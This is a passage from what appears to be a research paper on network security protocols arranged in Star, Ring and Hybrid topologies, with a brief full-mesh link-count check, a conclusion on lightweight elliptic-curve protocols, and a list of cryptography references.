Figure 1: A cluster of network security protocols supporting MTN

Normally, attackers can break a network using RF direction finding, traffic rate analysis and time-correlation monitoring. In the proposed MTN, however, an attacker cannot easily determine the roles played by nodes, the existence and location of nodes, or the current location of specific functions (MP or Lie). Further, the MTN has been classified into different models (Star, Ring and Hybrid) to serve different applications. Star-MTN is a collection of communication protocols connected to a central hub, which distributes NSP 1, 2 and 3 to the nodes; all communication lines traverse the central hub. The advantage of this topology is the simplicity of adding nodes, and it has applications in VSAT terminals. In local or wide area networks where Ring-MTN is used, each system is connected to the network in a closed loop or ring; all systems in the ring are connected to each other by NSP = {NSP 1, MP & Lie functions}, with the ability to switch from NSP 1 to NSP 2 or 3. Hybrid-MTN grows quadratically with the number of nodes: with n nodes, a full mesh requires n(n-1)/2 network paths. In this model, NSP 1 can be converted to NSP 2 or NSP 3 by exchanging MP or Lie functions between nodes. This model is widely applicable to telecommunication paths such as mobile roaming and international SMS.
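The full-mesh path count used above is the number of unordered node pairs, C(n, 2). A minimal check (helper name hypothetical):

```python
# Number of links in a full mesh of n nodes: one path per pair
# of nodes, i.e. C(n, 2) = n*(n-1)/2.
def full_mesh_paths(n: int) -> int:
    return n * (n - 1) // 2

assert full_mesh_paths(2) == 1    # two nodes share a single link
assert full_mesh_paths(5) == 10
assert full_mesh_paths(10) == 45  # quadratic growth in n
```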

[Figures 2-4 omitted: node diagrams of the Star, Ring and Hybrid MTN models, each showing NSP 1, 2 and 3 assigned to nodes.]

Figure 2: Star-MTN; Figure 3: Ring-MTN; Figure 4: Hybrid-MTN


8. Conclusion

The network security protocols produced by the system and method of this invention find a number of applications in information security and communication channels. In particular, they apply directly to remote sensing, keyless entry, access control and defense systems. Since these protocols are secure and less computationally complex than certificate-based PKC, they can be used together in an MTN to improve efficiency. In terms of memory and space, protocols 1, 2 and 3 with 256-bit ECC are suitable for tiny devices. Hence we conclude that the proposed protocols can be used for multiple applications.

References

Adi Shamir (1984) “Identity-Based Cryptosystems and Signature Schemes”, Advances in Cryptology: Proceedings of CRYPTO 84, Lecture Notes in Computer Science, vol 196, pp 47-53.

Al-Riyami, S.S. and Paterson, K.G. (2003) “Certificateless Public Key Cryptography”, Advances in Cryptology: Proceedings of ASIACRYPT 2003.

Bellare, M. and Rogaway, P. (1993) “Random Oracles are Practical: A Paradigm for Designing Efficient Protocols”, ACM CCS 93: 1st Conference on Computer and Communications Security, pp 62-73, USA.

Bellovin, S.M. and Merritt, M. (1992) “Encrypted Key Exchange: Password-Based Protocols Secure Against Dictionary Attacks”, IEEE Symposium on Security and Privacy, pp 72-84, Oakland, California, USA.

Certicom Research (2000) Standards for Efficient Cryptography, SEC 1: Elliptic Curve Cryptography, Ver. 1.0, [Online], Available: http://www.secg.org/download/aid-385/sec1_final.pdf

Diffie, W. and Hellman, M.E. (1976) “New Directions in Cryptography”, IEEE Transactions on Information Theory, 22(6):644-654.

Hankerson, D., Menezes, A. and Vanstone, S.A. (2004) Guide to Elliptic Curve Cryptography, Springer-Verlag.

Jacobson, Nathan (1979) Lie Algebras, Dover Publications, Inc., New York.

MacKenzie, P.D. (2002) The PAK Suite: Protocols for Password-Authenticated Key Exchange, Contributions to IEEE P1363.2.

Needham, R.M. and Schroeder, M.D. (1978) “Using Encryption for Authentication in Large Networks of Computers”, Communications of the ACM, 21(12):993-999.

Vijayarangan, Natarajan (2009) “Design and Analysis of Message Preprocessing Functions for Reducing Hash Collisions”, Proceedings of ISSSIS, Coimbatore, India.

Vijayarangan, Natarajan (2009) “Method for Preventing and Detecting Hash Collisions of Data During the Data Transmission”, USPTO Patent Pre-grant No. 20090085780.

Vijayarangan, N. and Kasilingam, S. (2004) “Random Number Generation Using Primitive Polynomials”, Proceedings of SSCCII, Italy.

Vijayarangan, N. and Vijayasarathy, R. (2005) “Primitive Polynomials Testing Methodology”, Journal of Discrete Mathematical Sciences and Cryptography, vol 8(3), pp 427-435.
